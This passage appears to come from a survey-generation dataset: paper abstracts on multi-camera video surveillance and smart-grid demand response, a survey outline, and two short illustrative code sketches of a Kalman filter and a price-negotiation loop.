particular, it is shown that a behavior model trained using an unlabeled data set is superior to those trained using the same but labeled data set in detecting anomaly from an unseen video. The experiments also suggest that our online LRT-based behavior recognition approach is advantageous over the commonly used Maximum Likelihood (ML) method in differentiating ambiguities among different behavior classes observed online. --- paper_title: Bayesian multi-camera surveillance paper_content: The task of multicamera surveillance is to reconstruct the paths taken by all moving objects that are temporally visible from multiple non-overlapping cameras. We present a Bayesian formalization of this task, where the optimal solution is the set of object paths with the highest posterior probability given the observed data. We show how to efficiently approximate the maximum a posteriori solution by linear programming and present initial experimental results. --- paper_title: Algorithms for Cooperative Multisensor Surveillance paper_content: The Video Surveillance and Monitoring (VSAM) team at Carnegie Mellon University (CMU) has developed an end-to-end, multicamera surveillance system that allows a single human operator to monitor activities in a cluttered environment using a distributed network of active video sensors. Video understanding algorithms have been developed to automatically detect people and vehicles, seamlessly track them using a network of cooperating active sensors, determine their three-dimensional locations with respect to a geospatial site model, and present this information to a human operator who controls the system through a graphical user interface. The goal is to automatically collect and disseminate real-time information to improve the situational awareness of security providers and decision makers. 
The feasibility of real-time video surveillance has been demonstrated within a multicamera testbed system developed on the campus of CMU. This paper presents an overview of the issues and algorithms involved in creating this semiautonomous, multicamera surveillance system. --- paper_title: Multiple Camera Tracking of Interacting and Occluded Human Motion paper_content: We propose a distributed, real-time computing platform for tracking multiple interacting persons in motion. To combat the negative effects of occlusion and articulated motion we use a multiview implementation, where each view is first independently processed on a dedicated processor. This monocular processing uses a predictor-corrector filter to weigh reprojections of three-dimensional (3-D) position estimates, obtained by the central processor, against observations of measurable image motion. The corrected state vectors from each view provide input observations to a Bayesian belief network, in the central processor, with a dynamic, multidimensional topology that varies as a function of scene content and feature confidence. The Bayesian net fuses independent observations from multiple cameras by iteratively resolving independency relationships and confidence levels within the graph, thereby producing the most likely vector of 3-D state estimates given the available data. To maintain temporal continuity, we follow the network with a layer of Kalman filtering that updates the 3-D state estimates. We demonstrate the efficacy of the proposed system using a multiview sequence of several people in motion. Our experiments suggest that, when compared with data fusion based on averaging, the proposed technique yields a noticeable improvement in tracking accuracy. ---
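The multi-camera tracking abstract above follows its Bayesian fusion stage with a layer of Kalman filtering, and several of the single-camera trackers cited earlier use the same predictor-corrector idea. As a minimal, hedged sketch of that component only, the fragment below runs a constant-velocity Kalman filter on 2-D position detections; the process and measurement noise levels are hypothetical, and data association and the multi-view fusion itself are not modeled.

import numpy as np

# Hedged sketch: constant-velocity Kalman filter over the state [x, y, vx, vy].
dt = 1.0
F = np.array([[1, 0, dt, 0],
              [0, 1, 0, dt],
              [0, 0, 1,  0],
              [0, 0, 0,  1]], dtype=float)     # state transition
H = np.array([[1, 0, 0, 0],
              [0, 1, 0, 0]], dtype=float)      # only position is measured
Q = 0.01 * np.eye(4)                           # process noise covariance (hypothetical)
R = 4.0 * np.eye(2)                            # measurement noise covariance (hypothetical)

def kf_step(x, P, z):
    x = F @ x                                  # predict
    P = F @ P @ F.T + Q
    y = z - H @ x                              # innovation
    S = H @ P @ H.T + R
    K = P @ H.T @ np.linalg.inv(S)             # Kalman gain
    x = x + K @ y                              # update
    P = (np.eye(4) - K @ H) @ P
    return x, P

x, P = np.zeros(4), 100.0 * np.eye(4)
for t in range(1, 6):
    z = np.array([2.0 * t, 1.0 * t])           # detections moving along a line
    x, P = kf_step(x, P, z)
print("estimated [x, y, vx, vy]:", np.round(x, 2))

In a multi-camera setting the measurement z would instead be the fused position estimate produced by the central reasoning stage, but the predict/update cycle itself is unchanged.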
Title: A Survey Of Activity Recognition And Understanding The Behavior In Video Surveillance
Section 1: INTRODUCTION
Description 1: This section introduces the study's objective, context, and overview of visual surveillance technologies and their applications.
Section 2: SURROUNDING OF MODEL
Description 2: This section discusses background modeling techniques and their use in detecting moving objects in video surveillance.
Section 3: OBJECT REPRESENTATION AND CLASSIFICATION
Description 3: This section covers methods for classifying and representing objects detected in surveillance footage.
Section 4: OBJECT TRACKING
Description 4: This section elaborates on techniques and challenges associated with tracking objects across video frames.
Section 5: DESCRIPTION AND BEHAVIOUR UNDERSTANDING
Description 5: This section details methods for understanding and recognizing human actions and behaviors from video data.
Section 6: DATA FUSION
Description 6: This section explains the importance of data fusion in handling occlusion and ensuring continuous object tracking.
Section 7: CONCLUSION
Description 7: This section summarizes the current state and future directions of automated video surveillance systems, focusing on behavior analysis and activity recognition.
A Survey on Demand Response Programs in Smart Grids: Pricing Methods and Optimization Algorithms
10
--- paper_title: Optimal Control Policies for Power Demand Scheduling in the Smart Grid paper_content: We study the problem of minimizing the long-term average power grid operational cost through power demand scheduling. A controller at the operator side receives consumer power demand requests with different power requirements, durations and time flexibilities for their satisfaction. Flexibility is modeled as a deadline by which a demand is to be activated. The cost is a convex function of total power consumption, which reflects the fact that each additional unit of power needed to serve demands is more expensive to provision, as demand load increases. We develop a stochastic model and introduce two online demand scheduling policies. In the first one, the Threshold Postponement (TP), the controller serves a new demand request immediately or postpones it to the end of its deadline, depending on current power consumption. In the second one, the Controlled Release (CR), a new request is activated immediately if power consumption is lower than a threshold, else it is queued. Queued demands are activated when deadlines expire or when consumption drops below the threshold. These policies admit an optimal control with switching curve threshold structure, which involves active and postponed demand. The CR policy is asymptotically optimal as deadlines increase, namely it achieves a lower bound on average cost, and the threshold depends only on active demand. Numerical results validate the benefit of our policies compared to the default one of serving demands upon arrival. --- paper_title: Demand response resources: Who is responsible for implementation in a deregulated market? paper_content: Demand response resources (DRR) have potential to offer substantial benefits in the form of improved economic efficiency in wholesale electricity markets. Those benefits include better capacity factors for existing capacity, reductions in requirements for new capacity, enhanced reliability, relief of congestion and transmission constraints, reductions in price volatility, mitigation of market power and lower electricity prices for consumers. However, DRR has been slow to penetrate. There has been substantial disagreement as to which entities in a restructured market should promote the expanded implementation of DRR. This paper contends that no single entity can perform this function. But rather, wider implementation will need to accrue from coordinated actions along the electricity supply chain. --- paper_title: Knowing when to act: an optimal stopping method for smart grid demand response paper_content: A major benefit of the smart grid is that it can provide real-time pricing, which enables residential electricity customers to reduce their electricity expenses by scheduling their appliance use. A commonly utilized technique is to operate electrical appliances when the price of electricity is low. Although this technique is simple in principle and easy to apply, there are several issues that need to be addressed: Studies have shown that residents do not know how, or have the time to take advantage of real-time price information; residents seek to save money by delaying device usage but do not want the inconvenience of long wait times; and a lack of automated energy management systems - industry trials of real-time pricing programs requiring manual user intervention have performed poorly. 
In this work, we address these issues by means of an optimal stopping approach, which can balance electricity expense and waiting time. We formulate the problem of deciding when to start home appliances as an optimal stopping problem, and combine optimal stopping rules with appliance energy usage profiles. Our result is an automated residential energy management and scheduling platform, which can reduce energy bills and minimize peak loads. Reduced peak loads result in lower usage rates of dirty coal-based peaker plants, reducing carbon emissions. Additional benefits include lower domestic energy use by controlling vampire loads. Simulation results show that our approach can reduce energy costs by about 10-50 percent depending on the appliance type, and demonstrate the usefulness of our approach in managing residential energy costs. --- paper_title: Demand Side Management: Demand Response, Intelligent Energy Systems, and Smart Loads paper_content: Energy management means to optimize one of the most complex and important technical creations that we know: the energy system. While there is plenty of experience in optimizing energy generation and distribution, it is the demand side that receives increasing attention from research and industry. Demand Side Management (DSM) is a portfolio of measures to improve the energy system at the side of consumption. It ranges from improving energy efficiency by using better materials, through smart energy tariffs with incentives for certain consumption patterns, to sophisticated real-time control of distributed energy resources. This paper gives an overview and a taxonomy for DSM, analyzes the various types of DSM, and gives an outlook on the latest demonstration projects in this domain. --- paper_title: Impact of demand response on distribution system reliability paper_content: Demand Response (DR) is a market driven and sometimes semi-emergency action performed at the utility level or at the Demand Response Service Provider (aggregator) with the objective of reducing the overall demand of the system during peak load hours. If implemented successfully, DR helps postpone the capacity expansion projects related to the distribution network, and provides a collaborative framework for the liberalized energy market of the Smart Grid. Customers subscribed to the DR program are requested to reduce their demand or turn off one or more energy consuming appliances in exchange for financial incentives such as extra payments or discounted electricity rates. This would change the concept of distribution system reliability as it is traditionally known. On one hand, DR could lead to a higher amount of unserved energy; on the other hand, it does not qualify as an unwanted lost load. This paper tries to provide a qualitative analysis on the impact of demand response on distribution system reliability. --- paper_title: Demand side management program evaluation based on industrial and commercial field data paper_content: Demand Response is increasingly viewed as an important tool for use by the electric utility industry in meeting the growing demand for electricity. There are two basic categories of demand response options: time varying retail tariffs and incentive Demand Response Programs. Electricity Saudi Company (ESC) is applying the time varying retail tariffs program, which is not suitable according to the studied load curves captured from the industrial and commercial sectors.
Different statistical studies on daily load curves for consumers connected to 22 kV lines are classified. The load curve criteria used for classification are based on peak ratio and night ratio. The data considered here is a set of 120 annual load curves corresponding to the electric power consumption (the western area of the Kingdom of Saudi Arabia (KSA)) of many clients in winter and some months in the summer (peak period). The study is based on real data from several Saudi customer sectors in many geographical areas with larger commercial and industrial customers. The study proved that the suitable Demand Response for the ESC is the incentive program. --- paper_title: Autonomous Demand-Side Management Based on Game-Theoretic Energy Consumption Scheduling for the Future Smart Grid paper_content: Most of the existing demand-side management programs focus primarily on the interactions between a utility company and its customers/users. In this paper, we present an autonomous and distributed demand-side energy management system among users that takes advantage of a two-way digital communication infrastructure which is envisioned in the future smart grid. We use game theory and formulate an energy consumption scheduling game, where the players are the users and their strategies are the daily schedules of their household appliances and loads. It is assumed that the utility company can adopt adequate pricing tariffs that differentiate the energy usage in time and level. We show that for a common scenario, with a single utility company serving multiple customers, the global optimal performance in terms of minimizing the energy costs is achieved at the Nash equilibrium of the formulated energy consumption scheduling game. The proposed distributed demand-side energy management strategy requires each user to simply apply its best response strategy to the current total load and tariffs in the power distribution system. The users can maintain privacy and do not need to reveal the details on their energy consumption schedules to other users. We also show that users will have the incentives to participate in the energy consumption scheduling game and to subscribe to such services. Simulation results confirm that the proposed approach can reduce the peak-to-average ratio of the total energy demand, the total energy costs, as well as each user's individual daily electricity charges. --- paper_title: A review on distributed energy resources and MicroGrid paper_content: The distributed energy resources (DER) comprise several technologies, such as diesel engines, micro turbines, fuel cells, photovoltaic, small wind turbines, etc. The coordinated operation and control of DER together with controllable loads and storage devices, such as flywheels, energy capacitors and batteries, are central to the concept of MicroGrid (MG). MG can operate interconnected to the main distribution grid, or in an islanded mode. This paper reviews the research and studies on MG technology. The operation of MG and the MG in the market environment are also described in the paper. --- paper_title: Smart Operation of Smart Grid: Risk-Limiting Dispatch paper_content: The drastic reduction of carbon emission to combat global climate change cannot be realized without a significant contribution from the electricity sector. Renewable energy resources must take a bigger share in the generation mix, effective demand response must be widely implemented, and high-capacity energy storage systems must be developed.
A smart grid is necessary to manage and control the increasingly complex future grid. Certain smart grid elements (renewables, storage, microgrid, consumer choice, and smart appliances) increase uncertainty in both supply and demand of electric power. Other smart grid elements (sensors, smart meters, demand response, and communications) provide more accurate information about the power system and more refined means of control. Simply building hardware for renewable generators and the smart grid, but still using the same operating paradigm of the grid, will not realize the full potential for overall system efficiency and carbon reduction. In this paper, a new operating paradigm, called risk-limiting dispatch, is proposed. It treats generation as a heterogeneous commodity of intermittent or stochastic power and uses information and control to design hedging techniques to manage the risk of uncertainty. --- paper_title: A summary of demand response in electricity markets paper_content: This paper presents a summary of Demand Response (DR) in deregulated electricity markets. The definition and the classification of DR as well as potential benefits and associated cost components are presented. In addition, the most common indices used for DR measurement and evaluation are highlighted, and some utilities' experiences with different demand response programs are discussed. Finally, the effect of demand response in electricity prices is highlighted using a simulated case study. --- paper_title: Demand response in smart electricity grids equipped with renewable energy sources: A review paper_content: Dealing with Renewable Energy Resources (RERs) requires sophisticated planning and operation scheduling along with state-of-the-art technologies. Among many possible ways for handling RERs, Demand Response (DR) is investigated in the current review. Because the definition and classification of DR announced by the Federal Energy Regulatory Commission (FERC) are modified every other year, the latest DR definition and classification are scrutinized in the present work. Moreover, a complete benefit and cost assessment of DR is added in the paper. Measurement and evolution methods along with the effects of DR on electricity prices are discussed. Next comes a DR literature review of recent papers, mainly published after 2008. Finally, successful DR implementations around the world are analyzed. --- paper_title: A user-mode distributed energy management architecture for smart grid applications paper_content: Future smart grids will require a flexible, observable, and controllable network architecture for reliable and efficient energy delivery under uncertain conditions. They will also necessitate variability in distributed energy generators and demand-side loads. This study presents a tree-like user-mode network architecture responding to these requirements. The approaches presented for the next-generation grid architecture facilitate the management of distributed generation strategies based on renewable sources, distributed storage, and demand-side load management. --- paper_title: Demand Response and Electricity Market Efficiency paper_content: Customer response is a neglected way of solving electricity industry problems. Historically, providers have focused on supply, assuming that consumers are unwilling or unable to modify their consumption.
Contrary to these expectations, a review of published studies indicates that customers respond to higher prices that they expect to continue by purchasing more efficient appliances and taking other efficiency measures. --- paper_title: Demand response and smart grids—A survey paper_content: The smart grid is conceived of as an electric grid that can deliver electricity in a controlled, smart way from points of generation to active consumers. Demand response (DR), by promoting the interaction and responsiveness of the customers, may offer a broad range of potential benefits on system operation and expansion and on market efficiency. Moreover, by improving the reliability of the power system and, in the long term, lowering peak demand, DR reduces overall plant and capital cost investments and postpones the need for network upgrades. In this paper, a survey of DR potentials and benefits in smart grids is presented. Innovative enabling technologies and systems, such as smart meters, energy controllers, and communication systems, which are decisive in facilitating the coordination of efficiency and DR in a smart grid, are described and discussed with reference to real industrial case studies and research projects. --- paper_title: Coordinating Storage and Demand Response for Microgrid Emergency Operation paper_content: Microgrids are assumed to be established at the low voltage distribution level, where distributed energy sources, storage devices, controllable loads and electric vehicles are integrated in the system and need to be properly managed. The microgrid system is a flexible cell that can be operated connected to the main power network or autonomously, in a controlled and coordinated way. The use of storage devices in microgrids is related to the provision of some form of energy buffering during autonomous operating conditions, in order to balance load and generation. However, frequency variations and limited storage capacity might compromise microgrid autonomous operation. In order to improve microgrid resilience in the moments subsequent to islanding, this paper presents innovative functionalities to run online, which are able to manage microgrid storage considering the integration of electric vehicles and load responsiveness. The effectiveness of the proposed algorithms is validated through extensive numerical simulations. --- paper_title: Intelligent unit commitment with vehicle-to-grid —A cost-emission optimization paper_content: A gridable vehicle (GV) can be used as a small portable power plant (S3P) to enhance the security and reliability of utility grids. Vehicle-to-grid (V2G) technology has drawn great interest in recent years and its success depends on intelligent scheduling of GVs or S3Ps in constrained parking lots. V2G can reduce dependencies on small expensive units in existing power systems, resulting in reduced operation cost and emissions. It can also increase reserve and reliability of existing power systems. Intelligent unit commitment (UC) with V2G for cost and emission optimization in power systems is presented in this paper. As the number of gridable vehicles in V2G is much higher than the number of small units in existing systems, UC with V2G is more complex than basic UC for only thermal units. Particle swarm optimization (PSO) is proposed to balance between cost and emission reductions for UC with V2G. PSO can reliably and accurately solve this complex constrained optimization problem easily and quickly.
In the proposed solution model, binary PSO optimizes on/off states of power generating units easily. Vehicles are represented by integer numbers instead of zeros and ones to reduce the dimension of the problem. Balanced hybrid PSO optimizes the number of gridable vehicles of V2G in the constrained parking lots. Balanced PSO provides a balance between local and global searching abilities, and finds a balance in reducing both operation cost and emission. Results show a considerable amount of cost and emission reduction with intelligent UC with V2G. Finally, the practicality of UC with V2G is discussed for real-world applications. --- paper_title: Smart Grid Communications: Overview of Research Challenges, Solutions, and Standardization Activities paper_content: Optimization of energy consumption in future intelligent energy networks (or Smart Grids) will be based on grid-integrated near-real-time communications between various grid elements in generation, transmission, distribution and loads. This paper discusses some of the challenges and opportunities of communications research in the areas of smart grid and smart metering. In particular, we focus on some of the key communications challenges for realizing interoperable and future-proof smart grid/metering networks, smart grid security and privacy, and how some of the existing networking technologies can be applied to energy management. Finally, we also discuss the coordinated standardization efforts in Europe to harmonize communications standards and protocols. --- paper_title: Smart Distribution: Coupled Microgrids paper_content: The distribution system provides major opportunities for smart grid concepts. One way to approach distribution system problems is to rethink our distribution system to include the integration of high levels of distributed energy resources, using microgrid concepts. Basic objectives are improved reliability, high penetration of renewable sources, dynamic islanding, and improved generation efficiencies through the use of waste heat. Managing significant levels of distributed energy resources (DERs) with a wide and dynamic set of resources and control points can become overwhelming. The best way to manage such a system is to break the distribution system down into small clusters or microgrids, with distributed optimizing controls coordinating multiple microgrids. The Consortium for Electric Reliability Technology Solutions (CERTS) concept views clustered generation and associated loads as a grid resource or a “microgrid.” The clustered sources and loads can operate in parallel to the grid or as an island. This grid resource can disconnect from the utility during events (i.e., faults, voltage collapses), but may also intentionally disconnect when the quality of power from the grid falls below certain standards. This paper focuses on DER-based distribution, the basics of microgrids, the possibility of smart distribution systems using coupled microgrids, and the current state of autonomous microgrid technology. --- paper_title: Autonomous Distributed V2G (Vehicle-to-Grid) Satisfying Scheduled Charging paper_content: To integrate large scale renewable energy sources in the power grid, battery energy storage plays an important role in smoothing their natural intermittency and ensuring grid-wide frequency stability. Electric vehicles have not only large introduction potential but also much available time for control because they are almost always plugged into home outlets as distributed battery energy storages.
Therefore, vehicle-to-grid (V2G) is expected to be one of the key technologies in smart grid strategies. This paper proposes an autonomous distributed V2G control scheme. A grid-connected electric vehicle supplies a distributed spinning reserve according to the frequency deviation at the plug-in terminal, which is a signal of supply and demand imbalance in the power grid. As a style of EV utilization, it is assumed that vehicle users set the next plug-out time in advance. Under this assumption, user convenience is satisfied by performing scheduled charging before the plug-out, and plug-in idle time is available for the V2G control. Therefore a smart charging control is considered in the proposed scheme. Satisfaction of vehicle user convenience and the effect on load frequency control are evaluated through simulation using a typical two-area interconnected power grid model and an automotive lithium-ion battery model. --- paper_title: Pool-Based Demand Response Exchange—Concept and Modeling paper_content: In restructured power systems, there are many independent players who benefit from demand response (DR). These include the transmission system operator (TSO), distributors, retailers, and aggregators. This paper proposes a new concept, the demand response eXchange (DRX), in which DR is treated as a public good to be exchanged between DR buyers and sellers. Buyers need DR to improve the reliability of their own electricity-dependent businesses and systems. Sellers have the capacity to significantly modify electricity demand on request. Microeconomic theory is applied to model the DRX in the form of a pool-based market. In this market, a DRX operator (DRXO) collects DR bids and offers from the buyers and sellers, respectively. It then clears the market by maximizing the total market benefit subject to certain constraints, including demand-supply balance and assurance contracts related to individual buyer contributions for DR. The DRX model is also tested on a small power system, and its efficiency is reported. --- paper_title: Distributed Demand and Response Algorithm for Optimizing Social-Welfare in Smart Grid paper_content: This paper presents a distributed Demand and Response algorithm for the smart grid with the objective of optimizing social welfare. Assuming the power demand range is known or predictable ahead of time, our proposed distributed algorithm will calculate demand and response of all participating energy demanders and suppliers, as well as energy flow routes, in a fully distributed fashion, such that the social welfare is optimized. During the computation, each node (e.g., demander or supplier) only needs to exchange limited rounds of messages with its neighboring nodes. It provides a potential scheme for energy trade among participants in smart grids. Our theoretical analysis proves that the algorithm converges even if there is some random noise induced in the process of our distributed Lagrange-Newton based solution. The simulation also shows that the result is close to that of a centralized solution. --- paper_title: The Smart Grid – A saucerful of secrets? paper_content: To many, a lot of secrets are at the bottom of the often-cited catchphrase "Smart Grid". This article gives an overview of the options that information and communication technology (ICT) offers for the restructuring and modernisation of the German power system, in particular with a view towards its development into a Smart Grid, and thus tries to reveal these secrets.
After a short outline on the development of ICT in terms of technology types and their availability, the further analysis highlights upcoming challenges in all parts of the power value chain and possible solutions for these challenges through the intensified usage of ICT applications. They are examined with regard to their effectiveness and efficiency in the fields of generation, transmission, distribution and supply. Finally, potential obstacles that may defer the introduction of ICT into the power system are shown. The analysis suggests that if certain hurdles are taken, the huge potential of ICT can create additional value in various fields of the whole power value chain. This ranges from increased energy efficiency and the more sophisticated integration of decentralised (renewable) energy plants to a higher security of supply and more efficient organisation of market processes. The results are true for the German power market but can in many areas also be transferred to other industrialised nations with liberalised power markets. --- paper_title: Integrated Voltage, Var Control and demand response in distribution systems paper_content: This paper addresses the requirements for utilizing Voltage and Var Control for demand response, in an operating environment which includes Smart-Grid, Distribution Management Systems, Advanced Metering Infrastructure, Demand Response, and Distributed Energy Resources. --- paper_title: Optimal pricing of default customers in electrical distribution systems: Effect behavior performance of demand response models paper_content: The response of a non-linear mathematical model is analyzed for the calculation of the optimal prices for electricity assuming default customers under different scenarios and using five different mathematical functions for the consumer response: linear, hyperbolic, potential, logarithmic and exponential. The mathematical functions are defined to simulate the hourly changes in the consumer response according to the load level, the price of electricity, and also depending on the elasticity at every hour. The behavior of the optimization model is evaluated separately under two different objective functions: the profit of the electric utility and the social welfare. The optimal prices as well as the served load are calculated for two different operation schemes: in an hourly basis and also assuming a single constant price for the 24 h of the day. Results obtained by the optimization model are presented and compared for the five different consumer load functions. --- paper_title: Demand side management program evaluation based on industrial and commercial field data paper_content: Demand Response is increasingly viewed as an important tool for use by the electric utility industry in meeting the growing demand for electricity. There are two basic categories of demand response options: time varying retail tariffs and incentive Demand Response Programs. Electricity Saudi Company (ESC) is applying the time varying retail tariffs program, which is not suitable according to the studied load curves captured from the industrial and commercial sectors. Different statistical studies on daily load curves for consumers connected to 22kV lines are classified. The load curve criteria used for classification is based on peak ratio and night ratio. 
The data considered here is a set of 120 annual load curves corresponding to the electric power consumption (the western area of the Kingdom of Saudi Arabia (KSA)) of many clients in winter and some months in the summer (peak period). The study is based on real data from several Saudi customer sectors in many geographical areas with larger commercial and industrial customers. The study proved that the suitable Demand Response for the ESC is the incentive program. --- paper_title: Demand Response Architecture: Integration into the Distribution Management System paper_content: Demand Response (DR) refers to actions taken by the utility to respond to a shortage of supply for a short duration of time in the future. DR is one of the enablers of the Smart Grid paradigm as it promotes interaction and responsiveness of the customers and changes the grid from a vertically integrated structure to one that is affected by the behavior of the demand side. In principle, it is possible to perform DR at the substation level for the customers connected to the feeders downstream or at the demand response service provider (aggregator) for the customers under its territory. This would allow for an area based solution driven mostly by the financial aspects as well as terms and conditions of the mutual agreements between the individual customers and the utility. However, as the penetration of DR increases, incorporating the network model into the DR analysis algorithm becomes necessary. This ensures the proper performance of the DR process and achieves peripheral objectives in addition to achieving the target demand reduction. The added value to the DR algorithm by incorporating the model of the distribution network can only be realized if the engine is developed as an integrated function of the Distribution Management System (DMS) at the network control center level. This paper focuses on the demand response architecture implemented at the DMS level and discusses some practical considerations associated with this approach. --- paper_title: Residential Demand Response model and impact on voltage profile and losses of an electric distribution network paper_content: This paper develops a model for Demand Response (DR) by utilizing consumer behavior modeling considering different scenarios and levels of consumer rationality. Consumer behavior modeling has been done by developing extensive demand-price elasticity matrices for different types of consumers. These price elasticity matrices (PEMs) are utilized to calculate the level of Demand Response for a given consumer considering a day-ahead real time pricing scenario. DR models are applied to the IEEE 8500-node test feeder which is a real world large radial distribution network. A comprehensive analysis has been performed on the effects of demand reduction and redistribution on system voltages and losses. Results show that considerable DR can cause a boost in system voltage, allowing room for further demand curtailment through demand side management techniques like Volt/Var Control (VVC). --- paper_title: Predictive power dispatch through negotiated locational pricing paper_content: A predictive mechanism is proposed in order to reduce price volatility linked to large fluctuations from demand and renewable energy generation in competitive electricity markets. The market participants are modelled as price-elastic units, price-inelastic units, and storage operators.
The distributed control algorithm determines prices over a time horizon through a negotiation procedure in order to maximize social welfare while satisfying network constraints. A simple flow allocation method is used to assign responsibility for constraint violations on the network to individual units and a control rule is then used to adjust nodal prices accordingly. Such a framework is appropriate for the inclusion of aggregated household appliances or other ‘virtual’ market participants realized through smart grid infrastructure. Results are examined in detail for a 4-bus network and then success is demonstrated for a densely-populated 39-bus network. Formal convergence requirements are given under a restricted subset of the demonstrated conditions. The scheme is shown to allow storage to reduce price volatility in the presence of fluctuating demand. --- paper_title: Real-time multi-agent support for decentralized management of electric power paper_content: Establishing clean or renewable energy sources involves the problem of adequate management for the networked power sources, in particular since producers are at the same time also consumers, and vice versa. We describe the first phases of the joint R&D project DEZENT between the School of Computer Science and the College of Electrical Engineering at the University of Dortmund, devoted to decentralized and adaptive electric power management through a distributed real-time multi-agent architecture. Unpredictable consumer requests or producer problems, under distributed control or local autonomy will be the major novelty. We present a distributed real-time negotiation algorithm involving agents on different levels of negotiation, on behalf of producers and consumers of electric energy. Despite the lack of global overview we are able to prove that in our model no coalition of malicious users could take advantage of extreme situations like arising from an abundance as much as from any (artificial) shortage of electric power that are typical problems in "free" or deregulated markets. Our multi-agent system exhibits a very high robustness against power failures compared to centrally controlled architectures. In extensive experiments we demonstrate how, in realistic settings of the German power system structure, the novel algorithms can cope with unforeseen needs and production specifics in a very flexible and adaptive way, taking care of most of the potentially hard deadlines already on the local group level (corresponding to a small subdivision). We further demonstrate that under our decentralized approach customers pay less than under any conventional (global) management policy or structure. --- paper_title: Demand Response and Distribution Grid Operations: Opportunities and Challenges paper_content: Demand response (DR) is becoming an integral part of power system and market operations. Smart grid technologies will further increase the use of DR in everyday operations. Once the volume of the DR reaches a certain threshold, the effect of the DR events on the distribution and transmission system operations will be hard to ignore. This paper proposes changing the business process of DR scheduling and implementation by integrating DR with distribution grid topology. Study cases using OATI webDistribute show the potential DR effect on distribution grid operations and the distribution grid changing the effectiveness of the DR. These examples illustrate the need of integrating demand response with the distribution grid. 
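The negotiated locational pricing and DEZENT-style negotiation entries above revolve around the same loop: a coordinator (or the agents themselves) iteratively adjusts a local price until network constraints are respected and price-elastic units have settled on their best response. The sketch below is one minimal way to picture such a control rule; the quadratic demand/supply curves, the single import line, the system price, and the step size are assumptions for illustration only, not the mechanisms of the cited papers.

```python
# Sketch of an iterative nodal price-adjustment loop in the spirit of the
# negotiated locational pricing and agent-negotiation papers above.
# All curves and parameters are illustrative assumptions.

SYSTEM_PRICE = 4.0     # assumed marginal price of imported power

def elastic_demand(price, a=10.0, b=1.0):
    # Consumer maximizes a*d - (b/2)*d^2 - price*d  ->  d = (a - price) / b
    return max((a - price) / b, 0.0)

def elastic_generation(price, c=2.0, d=0.5):
    # Local producer maximizes price*g - (c*g + (d/2)*g^2)  ->  g = (price - c) / d
    return max((price - c) / d, 0.0)

def negotiate_price(line_limit=1.0, step=0.2, iters=200):
    price = SYSTEM_PRICE
    for _ in range(iters):
        imports = elastic_demand(price) - elastic_generation(price)
        violation = imports - line_limit          # > 0: the import line is overloaded
        if abs(violation) < 1e-3:
            break
        # Control rule: congestion pushes the nodal price above the system
        # price; slack lets it relax back toward the system price.
        price = max(SYSTEM_PRICE, price + step * violation)
    return price, elastic_demand(price), elastic_generation(price)

print(negotiate_price())   # with these defaults, converges to the price at which the line is just full
```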
--- paper_title: Agent-Based Control Framework for Distributed Energy Resources Microgrids paper_content: Distributed energy resources (DERs) provide many benefits for the electricity users and utilities. However, the electricity distribution system traditionally was not designed to accommodate active power generation and storage at the distribution level. The microgrid provides an effective approach to integrating many small-scale distributed energy resources into the bulk electric grid. This paper presents an agent-based control framework for distributed energy resources microgrids. The features of agent technology are first discussed. An agent-based control framework for DER microgrids is then presented. To demonstrate the effectiveness of the proposed agent-based control framework, simulation studies have been performed on a dc distributed energy system that can be used in a microgrid as a modular power generation unit. Simulation results clearly indicate that the agent-based control framework is effective in coordinating the various distributed energy resources and managing the power and voltage profiles. --- paper_title: PowerMatcher: multiagent control in the electricity infrastructure paper_content: Different driving forces push electricity production towards decentralization. As a result, the current electricity infrastructure is expected to evolve into a network of networks, in which all system parts communicate with each other and influence each other. Multi-agent systems and electronic markets form an appropriate technology needed for control and coordination tasks in the future electricity network. We present the PowerMatcher, a market-based control concept for supply and demand matching (SDM) in electricity networks. A simulation study shows that the simultaneity of electricity production and consumption can be raised substantially using this concept. Further, we present a field test, currently in preparation, with medium-sized electricity producing and consuming installations controlled via this concept. --- paper_title: An Agent-based Market Platform for Smart Grids paper_content: The trend towards renewable, decentralized, and highly fluctuating energy suppliers (e.g. photovoltaic, wind power, CHP) introduces a tremendous burden on the stability of future power grids. By adding sophisticated ICT and intelligent devices, various Smart Grid initiatives work on concepts for intelligent power meters, peak load reductions, efficient balancing mechanisms, etc. As data in the Smart Grid scenario is inherently distributed over different, often non-cooperative parties, mechanisms for efficient coordination of suppliers, consumers and intermediators are required in order to ensure global functioning of the power grid. In this paper, a highly flexible market platform is introduced for coordinating self-interested energy agents representing power suppliers, customers and prosumers. These energy agents implement a generic bidding strategy that can be governed by local policies. These policies declaratively represent user preferences or constraints of the devices controlled by the agent. Efficient coordination between the agents is realized through a market mechanism that incentivizes the agents to reveal their policies truthfully to the market. By knowing the agents' policies, an efficient solution for the overall system can be determined.
As a proof-of-concept implementation, the market platform D'ACCORD is presented, which supports various market structures ranging from a single local energy exchange to a hierarchical energy market structure (e.g. as proposed in [10]). --- paper_title: Dynamic Residential Demand Response and Distributed Generation Management in Smart Microgrid with Hierarchical Agents paper_content: Smart grid has been a significant development trend of the power system. Within the smart grid, microgrids share the burden of traditional grids, reduce energy consumption cost and alleviate environmental deterioration. This paper proposes a dynamic Demand Response (DR) and Distributed Generation (DG) management approach in the context of a smart microgrid for a residential community. With a dynamic update mechanism, the DR operates automatically and allows manual intervention. The DG management coordinates with DR and considers stochastic elements, such as stochastic load and wind power, to reduce the energy consumption cost of the community. Simulation and numerical results show the effectiveness of the system in reducing the energy consumption cost while keeping users' satisfaction at a high level. --- paper_title: Residential Demand Response model and impact on voltage profile and losses of an electric distribution network paper_content: This paper develops a model for Demand Response (DR) by utilizing consumer behavior modeling considering different scenarios and levels of consumer rationality. Consumer behavior modeling has been done by developing extensive demand-price elasticity matrices for different types of consumers. These price elasticity matrices (PEMs) are utilized to calculate the level of Demand Response for a given consumer considering a day-ahead real time pricing scenario. DR models are applied to the IEEE 8500-node test feeder which is a real world large radial distribution network. A comprehensive analysis has been performed on the effects of demand reduction and redistribution on system voltages and losses. Results show that considerable DR can cause a boost in system voltage, allowing room for further demand curtailment through demand side management techniques like Volt/Var Control (VVC). --- paper_title: Evaluation and assessment of demand response potential applied to the meat industry paper_content: Demand response has proven to be a useful mechanism that produces important benefits for both the customer and the power system. In the context of an increasingly competitive electricity market, where prices are constantly rising and the presence of renewable energy resources is gaining prominence, this paper analyzes the flexibility potential of customers in the meat industry, based on the management of the most energy consuming process in this type of segment: cooling production and distribution. --- paper_title: Review of the Impact of Vehicle-to-Grid Technologies on Distribution Systems and Utility Interfaces paper_content: Plug-in vehicles can behave either as loads or as a distributed energy and power resource in a concept known as vehicle-to-grid (V2G) connection. This paper reviews the current status 